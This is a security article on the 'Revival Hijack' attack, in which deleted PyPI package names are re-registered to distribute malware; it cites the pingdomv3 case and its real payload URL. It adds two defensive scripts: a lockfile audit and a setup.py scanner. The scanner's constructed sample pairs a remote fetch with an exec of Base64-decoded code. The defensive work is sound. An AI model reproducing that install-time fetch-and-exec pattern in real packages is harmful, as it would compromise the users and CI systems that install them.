Threat actors frequently target PyPI because of its huge user base and open publishing model, which let a single malicious package reach a large part of the Python ecosystem.
Because anyone can publish to PyPI and package maintenance is spread across thousands of independent owners, monitoring and detecting malicious activity is hard, and attackers exploit the trust users place in established package names.
Researchers at JFrog recently identified a new attack technique, dubbed “Revival Hijack,” that could be used to take over more than 22,000 existing PyPI package names.
Technical analysis
Depending on the attacker’s targets, the “Revival Hijack” vector could result in hundreds of thousands of malicious package downloads.
The technique consists of re-registering abandoned (deleted) package names and using them to distribute malware. Researchers observed it in the wild in the hijack of the “pingdomv3” package.
Limiting the damage required several steps, including closer monitoring of package deletions and a faster response to suspicious re-registrations of known names.
Revival Hijacking represents a sophisticated attack vector against open-source software repositories, PyPI in particular.
Unlike typosquatting, which exploits user input errors, this technique takes advantage of the fact that a package name becomes available for registration immediately after its project is deleted.
Threat actors can register these names and inject harmful code under a previously trusted identity.
This poses significant risk, especially in CI/CD pipelines and for users relying on automated updates, where installs of the familiar name will silently pull whatever the new owner publishes. The analysis identified over 22,000 at-risk package names with significant download histories.
To demonstrate the attack’s feasibility, the researchers created a “security_holding” account and used it to safely reserve the highest-risk abandoned names; these placeholder packages accumulated roughly 200,000 downloads in just three months.
PyPI’s existing safeguards are:
- Normalized name matching (SQL regex operations that standardize package names before comparison).
- Similarity checks against existing names.
Both prove inadequate against this threat: they compare a new name against names currently in the index, and a deleted project is no longer there to match.
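The following is an added example, not JFrog’s tooling or code from the original report, of the kind of check a CI pipeline can run offline against its own lockfile to catch a revived name before installing it. It applies the same PEP 503 normalization PyPI uses before any lookup, then looks for the tell-tale signals of a revival: the pinned release has vanished, the pinned version was re-uploaded as a different artifact (what a hash-pinned install would reject), or the project’s entire release history is newer than the date the team first depended on it. All package names, versions, digests and dates are constructed sample data; the index metadata is shaped like the “releases” map of the PyPI JSON API but is hypothetical.

```python
"""Offline lockfile audit for "Revival Hijack" signals.

Added example, not code from JFrog or PyPI. A revived name has a tell: the
project's whole release history is newer than the date a team first depended
on it, and the release it pinned either vanished or was re-uploaded as a
different artifact. All names, versions, digests and dates are constructed.
"""
import re
from datetime import date, datetime


def normalize(name: str) -> str:
    """PEP 503 normalization, as PyPI applies it: Foo_Bar, foo-bar and foo.bar
    are one project, so every lookup must use the normalized form."""
    return re.sub(r"[-_.]+", "-", name).lower()


# Constructed lockfile: pinned version, sha256 of the pinned artifact (what
# `pip install --require-hashes` would verify) and the date the dependency was
# first introduced (e.g. from git blame on the lockfile).
LOCKFILE = {
    "Example_Tool": {"version": "1.4.2", "sha256": "aaa111", "first_pinned": "2021-05-01"},
    "good-lib":     {"version": "2.0.0", "sha256": "bbb222", "first_pinned": "2020-02-02"},
    "gone-lib":     {"version": "0.3.0", "sha256": "ccc333", "first_pinned": "2022-07-07"},
}

# Constructed metadata shaped like the "releases" map of the PyPI JSON API
# (https://pypi.org/pypi/<name>/json): version -> files, each with an
# upload_time and digests. "example-tool" models a revived name: its oldest
# release post-dates our pin and version 1.4.2 now has a different digest.
# "gone-lib" is absent: deleted, so the name is free for anyone to register.
INDEX = {
    "example-tool": {"releases": {
        "1.4.2": [{"upload_time": "2024-03-28T10:00:00", "digests": {"sha256": "dead01"}}],
        "1.5.0": [{"upload_time": "2024-03-29T10:00:00", "digests": {"sha256": "dead02"}}],
    }},
    "good-lib": {"releases": {
        "1.0.0": [{"upload_time": "2019-01-01T00:00:00", "digests": {"sha256": "old000"}}],
        "2.0.0": [{"upload_time": "2021-06-01T00:00:00", "digests": {"sha256": "bbb222"}}],
    }},
}


def earliest_upload(project: dict):
    """Date of the oldest file in any release, or None for an empty project."""
    times = [datetime.fromisoformat(f["upload_time"]).date()
             for files in project["releases"].values() for f in files]
    return min(times) if times else None


def check_dependency(name: str, pin: dict, index: dict) -> list:
    """Return revival signals for one pinned dependency (empty list = clean)."""
    project = index.get(normalize(name))
    if project is None:
        return ["not on index: name is deleted and available for anyone to register"]
    findings = []
    files = project["releases"].get(pin["version"], [])
    if not files:
        findings.append(f"pinned version {pin['version']} no longer exists on the index")
    elif all(f["digests"]["sha256"] != pin["sha256"] for f in files):
        findings.append(f"pinned version {pin['version']} was re-uploaded as a different artifact")
    first = earliest_upload(project)
    if first is not None and first > date.fromisoformat(pin["first_pinned"]):
        findings.append(f"entire release history starts {first}, after our first pin "
                        f"on {pin['first_pinned']}: likely revived name")
    return findings


def audit(lockfile: dict, index: dict) -> dict:
    """Map each dependency that raised at least one signal to its findings."""
    return {name: found for name, pin in lockfile.items()
            if (found := check_dependency(name, pin, index))}


if __name__ == "__main__":
    for name, found in audit(LOCKFILE, INDEX).items():
        print(name)
        for line in found:
            print("  -", line)
```

In a real pipeline the INDEX map would be fetched per dependency from the JSON API and the audit run before pip install; a “not on index” hit is the moment to pin the name under your own account (as the researchers did with their holding account), and a “different artifact” hit is exactly what hash pinning turns into a hard install failure.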
The ‘pingdomv3’ package is a real-world example of the attack’s effectiveness.
The original package was abandoned in March 2024 and swiftly replaced by a malicious version targeting Jenkins CI environments.
To deliver a payload fetched from an external URL (https://yyds.yyzs.workers.dev/meta/statistics), the threat actors used Base64 obfuscation and dynamic code execution via Python’s exec() function.
This evades simple static analysis and lets the attacker serve different code depending on the victim’s IP range or other environmental factors, enabling targeted attacks.
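As an added example (not the pingdomv3 package’s code or JFrog’s tooling), the following static triage script uses Python’s ast module to flag the two install-time patterns just described, exec()/eval() of a Base64-decoded argument and a network fetch during install, and it decodes long Base64 literals so a reviewer sees the hidden payload instead of a blob. The setup.py it scans is a constructed sample whose payload decodes to a harmless print() and whose URL is a placeholder, not the real delivery URL.

```python
"""Static triage of a setup.py for install-time obfuscation tricks.

Added example, not code from the malicious package or from JFrog. Flags
exec()/eval()/compile() calls, with a stronger finding when the argument is
base64-decoded, flags network calls, and decodes long Base64 literals.
The sample below is constructed: its payload is print("hello") and the URL
is a placeholder.
"""
import ast
import base64
import binascii

SAMPLE_SETUP_PY = '''
import base64, urllib.request
from setuptools import setup

payload = urllib.request.urlopen("https://example.invalid/meta/statistics").read()
exec(base64.b64decode("cHJpbnQoImhlbGxvIik="))
setup(name="demo", version="0.1")
'''

DYNAMIC_EXEC = {"exec", "eval", "compile"}
B64_DECODERS = {"b64decode", "decodebytes", "urlsafe_b64decode"}
# Fully qualified prefixes plus a few unambiguous bare names (from-imports).
NETWORK_PREFIXES = ("urllib.request.", "requests.", "http.client.", "socket.")
NETWORK_NAMES = {"urlopen", "urlretrieve"}


def dotted(node: ast.AST) -> str:
    """'urllib.request.urlopen' for a name/attribute chain, '' for anything else."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = dotted(node.value)
        return f"{base}.{node.attr}" if base else ""
    return ""


def contains_call(node: ast.AST, names: set) -> bool:
    """True if any call inside `node` (including node itself) ends in one of `names`."""
    return any(isinstance(n, ast.Call) and dotted(n.func).rsplit(".", 1)[-1] in names
               for n in ast.walk(node))


def string_literals(node: ast.AST):
    for n in ast.walk(node):
        if isinstance(n, ast.Constant) and isinstance(n.value, str):
            yield n


def scan_source(src: str) -> list:
    """Return sorted (line, description) findings for one Python source file."""
    tree = ast.parse(src)
    findings = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        full = dotted(node.func)
        name = full.rsplit(".", 1)[-1]
        if name in DYNAMIC_EXEC:
            obfuscated = any(contains_call(a, B64_DECODERS) for a in node.args)
            how = "of a base64-decoded payload" if obfuscated else "of dynamic input"
            findings.append((node.lineno, f"{name}() {how}"))
        elif full.startswith(NETWORK_PREFIXES) or name in NETWORK_NAMES:
            urls = [s.value for s in string_literals(node)
                    if s.value.startswith(("http://", "https://"))]
            findings.append((node.lineno, "network access at install time"
                             + (f": {urls[0]}" if urls else "")))
    # Decode long Base64 literals so the reviewer sees the hidden payload directly.
    for s in string_literals(tree):
        if len(s.value) < 16:
            continue
        try:
            raw = base64.b64decode(s.value, validate=True)
        except (binascii.Error, ValueError):
            continue
        if raw.isascii():
            findings.append((s.lineno, f"base64 literal decodes to {raw.decode()[:60]!r}"))
    return sorted(findings)


if __name__ == "__main__":
    for line, desc in scan_source(SAMPLE_SETUP_PY):
        print(f"line {line}: {desc}")
```

Run it over a package’s setup.py, or every .py in an sdist, before the package is allowed into CI. The name tables are deliberately narrow heuristics: a production version would add other decoders (codecs, zlib, marshal), and any hit inside setup.py is a reason for a manual look rather than a verdict, since legitimate build scripts rarely need exec() or the network at all.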
The case as a whole highlights the need for stronger safeguards in package management systems.